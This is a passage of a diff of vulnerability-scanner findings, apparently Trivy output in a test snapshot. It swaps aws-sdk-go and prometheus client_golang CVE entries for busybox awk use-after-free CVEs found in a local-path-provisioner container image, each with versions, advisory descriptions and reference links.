"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security.gentoo.org/glsa/202105-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://ubuntu.com/security/notices/USN-5179-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.40.54", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42378", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "https://access.redhat.com/security/cve/CVE-2021-42378", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42378", ], }, "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", - }, - { - "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://avd.aquasec.com/nvd/cve-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://access.redhat.com/security/cve/CVE-2021-42378", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.11.0", - "packageName": "github.com/prometheus/client_golang", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42379", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "https://access.redhat.com/security/cve/CVE-2021-42379", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42379", ], }, "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://avd.aquasec.com/nvd/cve-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://access.redhat.com/security/cve/CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42380", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42380", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42380", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://avd.aquasec.com/nvd/cve-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://access.redhat.com/security/cve/CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42381", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42381", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42381", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://avd.aquasec.com/nvd/cve-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://access.redhat.com/security/cve/CVE-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42382", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42382", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42382", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://avd.aquasec.com/nvd/cve-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://access.redhat.com/security/cve/CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42383", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42383", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-42383", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", + "location": 